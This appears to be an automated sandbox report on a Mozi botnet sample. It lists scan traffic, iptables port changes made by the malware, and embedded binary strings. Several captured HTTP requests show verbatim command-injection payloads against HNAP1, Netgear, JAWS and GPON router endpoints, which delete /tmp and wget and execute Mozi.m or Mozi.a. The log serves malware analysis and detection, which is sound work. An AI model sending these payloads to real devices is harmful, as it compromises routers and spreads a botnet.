              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 203.122.112.94:2323
              Source: global trafficTCP traffic: 192.168.2.20:59544 -> 157.20.10.149:81
              Source: global trafficTCP traffic: 192.168.2.20:42124 -> 63.188.189.233:8443
              Source: global trafficTCP traffic: 192.168.2.20:43584 -> 62.238.173.138:7574
              Source: global trafficTCP traffic: 192.168.2.20:39864 -> 102.217.189.148:8080
              Source: global trafficTCP traffic: 192.168.2.20:58152 -> 198.152.181.234:49152
              Source: global trafficTCP traffic: 192.168.2.20:48704 -> 20.154.149.216:8080
              Source: global trafficTCP traffic: 192.168.2.20:57762 -> 50.172.44.166:8443
              Source: global trafficTCP traffic: 192.168.2.20:32842 -> 44.207.80.65:8080
              Source: global trafficTCP traffic: 192.168.2.20:57258 -> 43.161.129.170:8080
              Source: global trafficTCP traffic: 192.168.2.20:35344 -> 16.216.117.103:7574
              Source: global trafficTCP traffic: 192.168.2.20:56296 -> 48.111.167.94:49152
              Source: global trafficTCP traffic: 192.168.2.20:44748 -> 21.44.246.61:49152
              Source: global trafficTCP traffic: 192.168.2.20:43884 -> 211.98.118.186:81
              Source: global trafficTCP traffic: 192.168.2.20:44378 -> 67.213.164.194:8080
              Source: global trafficTCP traffic: 192.168.2.20:51006 -> 73.168.42.71:8080
              Source: global trafficTCP traffic: 192.168.2.20:36092 -> 207.45.206.85:37215
              Source: global trafficTCP traffic: 192.168.2.20:35316 -> 38.115.189.82:8080
              Source: global trafficTCP traffic: 192.168.2.20:36154 -> 8.196.85.46:8080
              Source: global trafficTCP traffic: 192.168.2.20:52714 -> 169.231.254.119:5555
              Source: global trafficTCP traffic: 192.168.2.20:37056 -> 189.25.210.17:8443
              Source: global trafficTCP traffic: 192.168.2.20:56744 -> 102.162.109.251:81
              Source: global trafficTCP traffic: 192.168.2.20:53314 -> 93.118.156.27:37215
              Source: global trafficTCP traffic: 192.168.2.20:33544 -> 156.30.203.234:8443
              Source: global trafficTCP traffic: 192.168.2.20:37616 -> 96.227.71.31:8080
              Source: global trafficTCP traffic: 192.168.2.20:55648 -> 91.23.94.89:8080
              Source: global trafficTCP traffic: 192.168.2.20:38442 -> 43.30.240.136:8443
              Source: global trafficTCP traffic: 192.168.2.20:44360 -> 114.15.113.65:8080
              Source: global trafficTCP traffic: 192.168.2.20:35250 -> 126.165.195.44:8080
              Source: global trafficTCP traffic: 192.168.2.20:43476 -> 168.152.12.184:49152
              Source: global trafficTCP traffic: 192.168.2.20:42328 -> 185.198.59.136:7574
              Source: global trafficTCP traffic: 192.168.2.20:41498 -> 63.191.13.133:8080
              Source: global trafficTCP traffic: 192.168.2.20:52652 -> 139.249.198.163:5555
              Source: global trafficTCP traffic: 192.168.2.20:50270 -> 22.122.201.176:8080
              Source: global trafficTCP traffic: 192.168.2.20:33924 -> 159.133.144.14:8080
              Source: global trafficTCP traffic: 192.168.2.20:36110 -> 183.43.207.246:37215
              Source: global trafficTCP traffic: 192.168.2.20:49440 -> 22.142.197.254:49152
              Source: global trafficTCP traffic: 192.168.2.20:36466 -> 205.119.206.192:7574
              Source: global trafficTCP traffic: 192.168.2.20:58704 -> 74.5.113.71:7574
              Source: global trafficTCP traffic: 192.168.2.20:56056 -> 191.137.127.161:8443
              Source: global trafficTCP traffic: 192.168.2.20:47620 -> 67.96.246.134:5555
              Source: global trafficTCP traffic: 192.168.2.20:51942 -> 85.217.68.43:49152
              Source: global trafficTCP traffic: 192.168.2.20:32816 -> 117.25.227.147:8443
              Source: global trafficTCP traffic: 192.168.2.20:58336 -> 83.113.163.141:37215
              Source: global trafficTCP traffic: 192.168.2.20:60880 -> 95.68.187.209:8443
              Source: global trafficTCP traffic: 192.168.2.20:56160 -> 105.205.64.147:52869
              Source: global trafficTCP traffic: 192.168.2.20:36858 -> 89.129.131.73:8080
              Source: global trafficTCP traffic: 192.168.2.20:53906 -> 150.211.192.100:37215
              Source: global trafficTCP traffic: 192.168.2.20:34958 -> 155.238.66.118:49152
              Source: global trafficTCP traffic: 192.168.2.20:57126 -> 31.57.44.152:37215
              Source: global trafficTCP traffic: 192.168.2.20:59494 -> 178.149.93.21:8080
              Source: global trafficTCP traffic: 192.168.2.20:40610 -> 169.5.83.203:7574
              Source: global trafficTCP traffic: 192.168.2.20:48244 -> 48.145.15.35:7574
              Source: global trafficTCP traffic: 192.168.2.20:49132 -> 161.96.234.20:37215
              Source: global trafficTCP traffic: 192.168.2.20:57092 -> 202.72.100.208:52869
              Source: global trafficTCP traffic: 192.168.2.20:47052 -> 198.134.133.19:52869
              Source: global trafficTCP traffic: 192.168.2.20:43012 -> 6.37.90.74:37215
              Source: global trafficTCP traffic: 192.168.2.20:33624 -> 92.103.103.47:37215
              Source: global trafficTCP traffic: 192.168.2.20:60776 -> 19.61.113.43:7574
              Source: global trafficTCP traffic: 192.168.2.20:40486 -> 99.181.137.45:8080
              Source: global trafficTCP traffic: 192.168.2.20:37512 -> 171.192.201.93:52869
              Source: global trafficTCP traffic: 192.168.2.20:33650 -> 88.153.234.30:8080
              Source: global trafficTCP traffic: 192.168.2.20:33378 -> 184.151.108.119:8080
              Source: global trafficTCP traffic: 192.168.2.20:52078 -> 37.38.172.114:37215
              Source: global trafficTCP traffic: 192.168.2.20:55364 -> 3.55.225.207:5555
              Source: global trafficTCP traffic: 192.168.2.20:44412 -> 53.253.84.232:5555
              Source: global trafficTCP traffic: 192.168.2.20:48418 -> 166.130.48.19:5555
              Source: global trafficTCP traffic: 192.168.2.20:36482 -> 28.244.244.163:37215
              Source: global trafficTCP traffic: 192.168.2.20:59618 -> 113.161.190.188:52869
              Source: global trafficTCP traffic: 192.168.2.20:50044 -> 118.143.200.102:8080
              Source: global trafficTCP traffic: 192.168.2.20:47252 -> 46.177.88.163:8080
              Source: global trafficTCP traffic: 192.168.2.20:49984 -> 157.228.242.122:81
              Source: global trafficTCP traffic: 192.168.2.20:53300 -> 20.149.201.53:8080
              Source: global trafficTCP traffic: 192.168.2.20:58690 -> 198.225.2.23:49152
              Source: global trafficTCP traffic: 192.168.2.20:45076 -> 160.64.230.81:52869
              Source: global trafficTCP traffic: 192.168.2.20:51264 -> 139.159.32.150:8443
              Source: global trafficTCP traffic: 192.168.2.20:46258 -> 74.35.20.129:81
              Source: global trafficTCP traffic: 192.168.2.20:43480 -> 170.150.75.145:81
              Source: global trafficTCP traffic: 192.168.2.20:60366 -> 209.185.236.134:81
              Source: global trafficTCP traffic: 192.168.2.20:41370 -> 154.210.234.104:8080
              Source: global trafficTCP traffic: 192.168.2.20:59728 -> 50.48.206.45:7574
              Source: global trafficTCP traffic: 192.168.2.20:58308 -> 18.73.233.15:8443
              Source: global trafficTCP traffic: 192.168.2.20:35666 -> 216.193.98.28:8443
              Source: global trafficTCP traffic: 192.168.2.20:47722 -> 8.195.111.22:5555
              Source: global trafficTCP traffic: 192.168.2.20:44058 -> 57.53.105.210:52869
              Source: global trafficTCP traffic: 192.168.2.20:54806 -> 152.234.42.42:37215
              Source: global trafficTCP traffic: 192.168.2.20:48540 -> 220.165.10.156:8080
              Source: global trafficTCP traffic: 192.168.2.20:40736 -> 175.10.248.75:8080
              Source: global trafficTCP traffic: 192.168.2.20:37594 -> 124.244.15.23:8080
              Source: global trafficTCP traffic: 192.168.2.20:55900 -> 219.224.59.244:52869
              Source: global trafficTCP traffic: 192.168.2.20:37038 -> 132.70.142.5:81
              Source: global trafficTCP traffic: 192.168.2.20:56930 -> 34.188.48.201:8080
              Source: global trafficTCP traffic: 192.168.2.20:46906 -> 115.16.10.21:49152
              Source: global trafficTCP traffic: 192.168.2.20:50726 -> 58.177.55.29:8080
              Source: global trafficTCP traffic: 192.168.2.20:49846 -> 63.153.103.58:8080
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 220.81.142.179:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 218.237.227.44:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 221.197.159.218:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 99.70.134.35:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 204.122.188.208:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 212.226.50.190:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 90.192.99.77:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 92.82.131.177:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 184.104.186.255:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 80.254.91.193:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 83.101.129.190:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 150.65.96.123:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 13.28.70.135:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 98.124.110.124:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 180.54.149.225:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 71.97.182.98:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 103.221.97.223:2323
              Source: global trafficTCP traffic: 192.168.2.20:52662 -> 19.234.87.63:8080
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 145.239.19.214:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 114.2.64.142:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 130.221.2.128:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 169.240.120.21:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 4.225.63.171:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 171.88.94.59:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 12.149.196.84:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 110.105.251.231:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 36.251.209.137:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 136.242.26.58:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 80.170.60.151:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 110.76.95.204:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 67.181.53.78:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 169.238.12.52:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 163.191.185.236:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 118.202.243.49:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 94.171.188.7:2323
              Source: global trafficTCP traffic: 192.168.2.20:53980 -> 208.121.15.128:5555
              Source: global trafficTCP traffic: 192.168.2.20:50642 -> 122.143.33.15:37215
              Source: global trafficTCP traffic: 192.168.2.20:36584 -> 44.186.214.45:8080
              Source: global trafficTCP traffic: 192.168.2.20:38480 -> 31.94.18.17:8080
              Source: global trafficTCP traffic: 192.168.2.20:41372 -> 149.223.98.215:8443
              Source: global trafficTCP traffic: 192.168.2.20:34480 -> 173.136.33.68:8443
              Source: global trafficTCP traffic: 192.168.2.20:58924 -> 96.60.228.58:5555
              Source: global trafficTCP traffic: 192.168.2.20:59914 -> 101.103.73.125:5555
              Source: global trafficTCP traffic: 192.168.2.20:32820 -> 58.160.77.79:5555
              Source: global trafficTCP traffic: 192.168.2.20:35174 -> 55.187.169.167:5555
              Source: global trafficTCP traffic: 192.168.2.20:42894 -> 169.8.56.140:5555
              Source: global trafficTCP traffic: 192.168.2.20:59034 -> 95.195.140.113:8443
              Source: global trafficTCP traffic: 192.168.2.20:47696 -> 204.31.115.147:8080
              Source: global trafficTCP traffic: 192.168.2.20:59066 -> 40.138.183.204:8080
              Source: global trafficTCP traffic: 192.168.2.20:51500 -> 154.57.107.198:49152
              Source: global trafficTCP traffic: 192.168.2.20:55828 -> 19.76.200.46:49152
              Source: global trafficTCP traffic: 192.168.2.20:49682 -> 122.101.90.140:81
              Source: global trafficTCP traffic: 192.168.2.20:51458 -> 87.162.119.140:37215
              Source: global trafficTCP traffic: 192.168.2.20:33784 -> 176.181.32.218:8080
              Source: global trafficTCP traffic: 192.168.2.20:36488 -> 194.160.179.117:37215
              Source: global trafficTCP traffic: 192.168.2.20:35776 -> 168.222.225.0:49152
              Source: global trafficTCP traffic: 192.168.2.20:41830 -> 55.141.32.238:8080
              Source: global trafficTCP traffic: 192.168.2.20:48042 -> 153.116.121.166:81
              Source: global trafficTCP traffic: 192.168.2.20:38162 -> 122.134.129.152:8443
              Source: global trafficTCP traffic: 192.168.2.20:52448 -> 186.91.75.186:7574
              Source: global trafficTCP traffic: 192.168.2.20:37012 -> 49.143.93.65:52869
              Source: global trafficTCP traffic: 192.168.2.20:56254 -> 50.31.248.176:5555
              Source: global trafficTCP traffic: 192.168.2.20:46686 -> 22.31.234.115:8080
              Source: global trafficTCP traffic: 192.168.2.20:45678 -> 39.179.29.20:37215
              Source: global trafficTCP traffic: 192.168.2.20:34350 -> 177.203.121.240:8080
              Source: global trafficTCP traffic: 192.168.2.20:48980 -> 53.110.221.193:49152
              Source: global trafficTCP traffic: 192.168.2.20:49152 -> 143.43.201.31:7574
              Source: global trafficTCP traffic: 192.168.2.20:46992 -> 42.124.198.47:52869
              Source: global trafficTCP traffic: 192.168.2.20:51302 -> 68.103.167.2:49152
              Source: global trafficTCP traffic: 192.168.2.20:58110 -> 45.46.146.31:8080
              Source: global trafficTCP traffic: 192.168.2.20:40950 -> 44.114.159.0:8080
              Source: global trafficTCP traffic: 192.168.2.20:42496 -> 6.179.235.226:8080
              Source: global trafficTCP traffic: 192.168.2.20:44480 -> 203.133.121.10:37215
              Source: global trafficTCP traffic: 192.168.2.20:51428 -> 157.201.127.64:8443
              Source: global trafficTCP traffic: 192.168.2.20:38854 -> 74.86.38.158:49152
              Source: global trafficTCP traffic: 192.168.2.20:60592 -> 14.247.219.102:37215
              Source: global trafficTCP traffic: 192.168.2.20:46030 -> 70.95.221.241:8080
              Source: global trafficTCP traffic: 192.168.2.20:59406 -> 208.150.175.68:49152
              Source: global trafficTCP traffic: 192.168.2.20:55114 -> 160.12.55.21:8080
              Source: global trafficTCP traffic: 192.168.2.20:42936 -> 134.147.43.174:8443
              Source: global trafficTCP traffic: 192.168.2.20:52754 -> 40.118.219.24:8080
              Source: global trafficTCP traffic: 192.168.2.20:41908 -> 63.12.57.100:8080
              Source: global trafficTCP traffic: 192.168.2.20:56264 -> 74.98.122.143:8080
              Source: global trafficTCP traffic: 192.168.2.20:39558 -> 202.157.106.25:8080
              Source: global trafficTCP traffic: 192.168.2.20:56204 -> 159.153.119.69:8080
              Source: global trafficTCP traffic: 192.168.2.20:51496 -> 84.27.204.184:8080
              Source: global trafficTCP traffic: 192.168.2.20:50812 -> 152.15.88.72:8443
              Source: global trafficTCP traffic: 192.168.2.20:60200 -> 33.177.217.109:8080
              Source: global trafficTCP traffic: 192.168.2.20:51190 -> 11.100.127.8:5555
              Source: global trafficTCP traffic: 192.168.2.20:52832 -> 126.130.202.154:8080
              Source: global trafficTCP traffic: 192.168.2.20:35870 -> 2.9.169.104:8443
              Source: global trafficTCP traffic: 192.168.2.20:59600 -> 171.146.122.140:8443
              Source: global trafficTCP traffic: 192.168.2.20:35460 -> 98.66.36.94:8080
              Source: global trafficTCP traffic: 192.168.2.20:43902 -> 12.24.80.216:7574
              Source: global trafficTCP traffic: 192.168.2.20:34406 -> 16.194.20.156:8080
              Source: global trafficTCP traffic: 192.168.2.20:36742 -> 109.93.120.96:8080
              Source: global trafficTCP traffic: 192.168.2.20:59882 -> 219.181.14.154:81
              Source: /bin/sh (PID: 4638) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5118) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
              Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0 | Host: 144.76.43.37:80 | Content-Type: text/xml; charset="utf-8" | SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` | Content-Length: 640 | Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0 | Host: 23.254.64.88:80 | Content-Type: text/xml; charset="utf-8" | SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` | Content-Length: 640 | Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0 | Host: 113.161.185.44:80 | Content-Type: text/xml; charset="utf-8" | SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` | Content-Length: 640 | Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0 | Host: 34.66.226.190:80 | Content-Type: text/xml; charset="utf-8" | SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` | Content-Length: 640 | Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: /tmp/mozi.a.zip (PID: 4621) | Socket: 0.0.0.0::60120
              Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: text/html | Content-Encoding: gzip | Vary: Accept-Encoding | Server: Microsoft-IIS/7.5 | X-Powered-By: ASP.NET | Date: Sat, 06 Feb 2021 10:39:02 GMT | Content-Length: 205
              Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 | User-Agent: Hello, world | Host: 175.203.81.2:80 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | Connection: keep-alive
              Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 | User-Agent: Hello, world | Host: 23.217.12.208:80 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | Connection: keep-alive
              Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 | User-Agent: Hello, world | Host: 47.246.22.230:80 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | Connection: keep-alive
              Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 | User-Agent: Hello, world | Host: 159.140.205.214:80 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | Connection: keep-alive
              Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 | User-Agent: Hello, world | Host: 24.239.192.38:80 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | Connection: keep-alive
              Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 | User-Agent: Hello, world | Host: 13.89.231.175:80 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | Connection: keep-alive
              Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 | User-Agent: Hello, world | Host: 193.248.153.76:80 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | Connection: keep-alive
              Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 | User-Agent: Hello, world | Host: 74.79.213.38:80 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | Connection: keep-alive
              Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 | User-Agent: Hello, world | Host: 23.236.242.26:80 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | Connection: keep-alive
              Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 | User-Agent: Hello, world | Host: 23.12.191.118:80 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | Connection: keep-alive
              Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 | User-Agent: Hello, world | Host: 180.254.107.55:80 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | Connection: keep-alive
              Source: unknown | DNS traffic detected: queries for: dht.transmissionbt.com
              Source: unknown | HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1 | Host: 127.0.0.1:80 | Connection: keep-alive | Accept-Encoding: gzip, deflate | Accept: */* | User-Agent: Hello, World | Content-Length: 118 | Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Sat, 06 Feb 2021 10:36:20 GMT | Connection: close | Content-Length: 315 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
              Source: mozi.a.zip | String found in binary or memory: http://%s:%d/Mozi.a;chmod
              Source: mozi.a.zip | String found in binary or memory: http://%s:%d/Mozi.a;sh$
              Source: mozi.a.zip | String found in binary or memory: http://%s:%d/Mozi.m
              Source: mozi.a.zip | String found in binary or memory: http://%s:%d/Mozi.m;
              Source: mozi.a.zip | String found in binary or memory: http://%s:%d/Mozi.m;$
              Source: mozi.a.zip | String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
              Source: mozi.a.zip | String found in binary or memory: http://%s:%d/bin.sh
